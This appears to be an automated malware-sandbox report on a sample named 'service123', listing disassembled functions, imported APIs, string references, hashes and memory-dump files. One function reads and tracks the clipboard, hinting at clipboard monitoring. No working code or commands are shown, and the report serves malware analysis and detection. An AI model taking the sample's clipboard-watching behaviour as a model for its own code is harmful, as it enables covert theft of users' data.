Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 407195eb19dce564565cc0aac164c41cb1f0525aa22eb769b343a03cae599f59
Instruction ID: 191eafcb57815de25ef565a5edfaf9d9e6fda4446aeac32888ab533c1e0466ce
Opcode Fuzzy Hash: 407195eb19dce564565cc0aac164c41cb1f0525aa22eb769b343a03cae599f59
Instruction Fuzzy Hash: BE219F7150D346CFD7418F18C0843AEBBA1AF99704F5885BEECC85FA0BC77598858BA2

Function 002D1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 002D106B
__p__fmode.MSVCRT ref: 002D1070
__p__commode.MSVCRT ref: 002D107D

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 508a8c06214228fb163f401191713336b21a0bdf0def69c0445c2635e05345e9
Instruction ID: 9ee3f6f3895395b7a56fe25990a714af6fa189145ae461835d8a77bb105fccb2
Opcode Fuzzy Hash: 508a8c06214228fb163f401191713336b21a0bdf0def69c0445c2635e05345e9
Instruction Fuzzy Hash: A321D270921242EFD310BF20E84936533E1BB40306F94852BC8084BB66E77ADCF6DB91

Function 6C2F9BD7 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C2F9BE7
GlobalLock.KERNEL32 ref: 6C2F9BF9
GlobalUnlock.KERNEL32 ref: 6C2F9C1A
CloseClipboard.USER32 ref: 6C2F9C23
CloseClipboard.USER32 ref: 6C2F9C48
GetClipboardSequenceNumber.USER32 ref: 6C2F9C6E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockNumberSequenceUnlock
String ID:
API String ID: 1345600146-0
Opcode ID: e5954c4c253d0a4e707c1715fbc31060c042269e13b318264b20914914cf3c7e
Instruction ID: 0af21024428d4cb56aad0ef14e24019c858b7deb45b5c1a85444de6d5aaed4b5
Opcode Fuzzy Hash: e5954c4c253d0a4e707c1715fbc31060c042269e13b318264b20914914cf3c7e
Instruction Fuzzy Hash: 4AF081B27892058FEB04BF7CD64816EBBF0AB55215F010A3CECD293244EB3194198B93

Function 6C359D20 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C359D35
strlen.MSVCRT ref: 6C359D3F
memcpy.MSVCRT ref: 6C359D68
setlocale.MSVCRT ref: 6C359D7C

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 22d34ceb9f1bfd6dbd67fadc0943c7faadcef01d8021f849c19c8acf206b19bb
Instruction ID: 8f26f123ced6a64025e4bcd940d36bd35ed268edf1f027e1074784e66a530ade
Opcode Fuzzy Hash: 22d34ceb9f1bfd6dbd67fadc0943c7faadcef01d8021f849c19c8acf206b19bb
Instruction Fuzzy Hash: 7CF034B16093189AD3007F68A4453AFFAE4EF80788F01885DE8D88B711DB74C869DF83

Function 6C37B740 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

H;l, xrefs: 6C3B5240
T;l, xrefs: 6C3B51F8

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: H;l$T;l
API String ID: 0-3102216014
Opcode ID: 63cec7fc14c0d2742cf1ccd48e988918e0cb9d7f5e7ab10417ec38f2510e023e
Instruction ID: 218511f68c20ae43ebdd713640b5e8668d3906fa465b7e0b2643b1c9624d7841
Opcode Fuzzy Hash: 63cec7fc14c0d2742cf1ccd48e988918e0cb9d7f5e7ab10417ec38f2510e023e
Instruction Fuzzy Hash: 37E1C8B4204B588BD7417F3084805BEB6B1AF99688F416C2CD8C66BF01CF7885499FEB

Function 6C2F4C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 6C2F4D17
u, xrefs: 6C2F4C66

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 9e32f61a189aae8e28e3d002b91d536a3dce2b1427621bf1ce97d31b45bbbeb6
Instruction ID: ef445940dca25ac3aa68f34f700cca65f601ced8261d1694a0f370579df5b155
Opcode Fuzzy Hash: 9e32f61a189aae8e28e3d002b91d536a3dce2b1427621bf1ce97d31b45bbbeb6
Instruction Fuzzy Hash: 01A18F7168C39E8BD721CE28C19079AF7E1BB85309F15862DECE887741D774D54ACB82

Function 002D4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 002D4647
u, xrefs: 002D4596

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 5c944a93b9a82da32e5e8cd1e59d7623cd5508d8687a215cda07c0ebb843f06e
Instruction ID: 33f507a8878a6a0f54fa2c35d997c51e6847cc369bc07279dec211d35cde9341
Opcode Fuzzy Hash: 5c944a93b9a82da32e5e8cd1e59d7623cd5508d8687a215cda07c0ebb843f06e
Instruction Fuzzy Hash: 3BA18F315283928BD730EF24D0803AABBE1BB95318F148A1FE8D997381D735DD59DB82

Function 6C2F52F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2F548E

Part of subcall function 6C2F2F00: fputc.MSVCRT ref: 6C2F2FC8

Strings

(null), xrefs: 6C2F52F7
@, xrefs: 6C2F4D17

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 01d1c6103753631673aacbddbbaefdf8b1e0005a23035213bcf3aad7d653ad8c
Instruction ID: 3e42e94fcf05b805ab5e296bbd4083e62d693f91e9cae7a220ba006599cbba35
Opcode Fuzzy Hash: 01d1c6103753631673aacbddbbaefdf8b1e0005a23035213bcf3aad7d653ad8c
Instruction Fuzzy Hash: 0C91AF7168C35E8BD7218E28C19079AF7E1BB85709F15862DECE887741D7B4E50BCB82

Function 002D4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 002D4DBE

Part of subcall function 002D2830: fputc.MSVCRT ref: 002D28F8

Strings

@, xrefs: 002D4647
(null), xrefs: 002D4C27

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: f405afb9a5d1dacd4916dfeb01aea2cb7a2a512aee22e8ebe2db6e74d3289488
Instruction ID: 28bebf4119045f4602f7104dce9b8897c89ca50b7a7815e6621dfd41cfbb6aa1
Opcode Fuzzy Hash: f405afb9a5d1dacd4916dfeb01aea2cb7a2a512aee22e8ebe2db6e74d3289488
Instruction Fuzzy Hash: 3691A0316283928BD731AF24D0803AABBE1BF85318F148A1FD8D897382D735DD55DB82

Function 6C375B60 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C375B9A
wcslen.MSVCRT ref: 6C375C2C
wcslen.MSVCRT ref: 6C375CBE
strlen.MSVCRT ref: 6C375D50

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 9f721eb8fb3013c2eed1286f5540b0ddf5294a75beac4ae28b4bec75186b23bc
Instruction ID: 6d5b033617cefb231263067ba5ab73da25a726c42a724ee9002f5219e67026be
Opcode Fuzzy Hash: 9f721eb8fb3013c2eed1286f5540b0ddf5294a75beac4ae28b4bec75186b23bc
Instruction Fuzzy Hash: DCF15AB4A04605CFC714DF6CC084AAEBBF0BF44318B108669E895DBB54DB39E945CF96

Function 6C375380 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C3753BA
wcslen.MSVCRT ref: 6C37544C
wcslen.MSVCRT ref: 6C3754DE
strlen.MSVCRT ref: 6C375570

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 10965734881dc6e81e6e8c12e1a9b054142d1286d7c00a3733dbd74ee7e201a0
Instruction ID: db62d08e93e0319eb8aa4569b00eb81d8c7f68ca5c43b8d6b0b5c6389df6461d
Opcode Fuzzy Hash: 10965734881dc6e81e6e8c12e1a9b054142d1286d7c00a3733dbd74ee7e201a0
Instruction Fuzzy Hash: C4F15874A046058FC714DFA8C0849AEBBF1BF44318B108A68E895DBB54DB39E945CF96

Function 6C2F3080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2F3101

Strings

NaN, xrefs: 6C2F3081

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 213a20a117dc09384e8726bfdb90cca49691d2c4cfe000918c9f991ddd1dc93f
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 6F4118B1A4561ECBDB10DF1CC480786F7E1BF85705B298299EC688F74AD332D8478B92

Function 002D29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 002D2A31

Strings

NaN, xrefs: 002D29B1

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: 6192363ec22818fc297d426c9e77b91313285e7cc36a99851a54addc92378181
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 1A412971A14216CBDB20CF18C4C0796B7E1EF98700B29C29ADC888F34AD372DC5ACB90

Function 6C374B80 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C374BBA
strlen.MSVCRT ref: 6C374C3D
strlen.MSVCRT ref: 6C374CC0
strlen.MSVCRT ref: 6C374D43

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 9305bfedb9bc67a215e9141d7a63b212bf6c5277b53ebd84408a1066f7911f8d
Instruction ID: c75415d4cf6a65f0d7c8c4cc39c61d968b21575e0552c93e84dbed75cf920d9a
Opcode Fuzzy Hash: 9305bfedb9bc67a215e9141d7a63b212bf6c5277b53ebd84408a1066f7911f8d
Instruction Fuzzy Hash: 5CE16874A046058FC710DF6CC184AAEFBF1BF48314B108A69E895CBB54DB39E906CF96

Function 6C374380 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3743BA
strlen.MSVCRT ref: 6C37443D
strlen.MSVCRT ref: 6C3744C0
strlen.MSVCRT ref: 6C374543

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: d50f651da02617faa0d10c528e962b7c8fb58d154c350583ff376da1b67a165b
Instruction ID: 65016b39d4dea9f958cc53bdeb42f44916007d99598045d0e9027e10ac2c1f8f
Opcode Fuzzy Hash: d50f651da02617faa0d10c528e962b7c8fb58d154c350583ff376da1b67a165b
Instruction Fuzzy Hash: 30E13874A046458FCB10DF6CC0849AEFBF1BF45314B108A69E8A5CBB54DB39E906CF96

Function 6C2FDFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C2FDFAE
strlen.MSVCRT ref: 6C2FDFC1

Strings

basic_string: construction from null is not valid, xrefs: 6C2FDFE3

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: e00d57fe9a44fed546520db39540824f651b90e06f8adcbfe7caf109293c458b
Instruction ID: eec15d064eb8c7a16717c93863d8711ac44009064eac1079a3d18f6fbb568d01
Opcode Fuzzy Hash: e00d57fe9a44fed546520db39540824f651b90e06f8adcbfe7caf109293c458b
Instruction Fuzzy Hash: CF113D72A482048F9701FF3DC94545EB7F1AB89224F84CA6DEC9897709E734D41A8FA3

Function 6C2F3616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2F3567
fputc.MSVCRT ref: 6C2F35D7
memset.MSVCRT ref: 6C2F3692

Strings

o, xrefs: 6C2F362E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: 9f6cc1fea26b327d7431f749df055cc2ad1ecb4a4902e34f59d0639d388e7c12
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: ED31387294820E8FCB01CF28C180799FBF1BB88354F158659EDA9ABB01E734E946CB41

Function 002D2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 002D2E97
fputc.MSVCRT ref: 002D2F07
memset.MSVCRT ref: 002D2FC2

Strings

o, xrefs: 002D2F5E

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: f3db93998547f4db57b9dbcc28a01c808613599e4999f72a3460d8f161d32f70
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 84313872914206CFCB11CF68C18479ABBF1BF68340F158A5AD989AB742E734FD58CB90

Function 6C2F3AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2F3A5F
fputc.MSVCRT ref: 6C2F3AC1

Strings

@, xrefs: 6C2F3AFA

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 6182ffa471cc8c3b75928bc0c0343e9fa34db9cc1390d89321264aac43a321e8
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 4011427199520D8BCB01DF19C580B85FBF1BF45305F258698EDA95FB49D334D802CB42

Function 002D3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 002D338F
fputc.MSVCRT ref: 002D33F1

Strings

@, xrefs: 002D342A

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

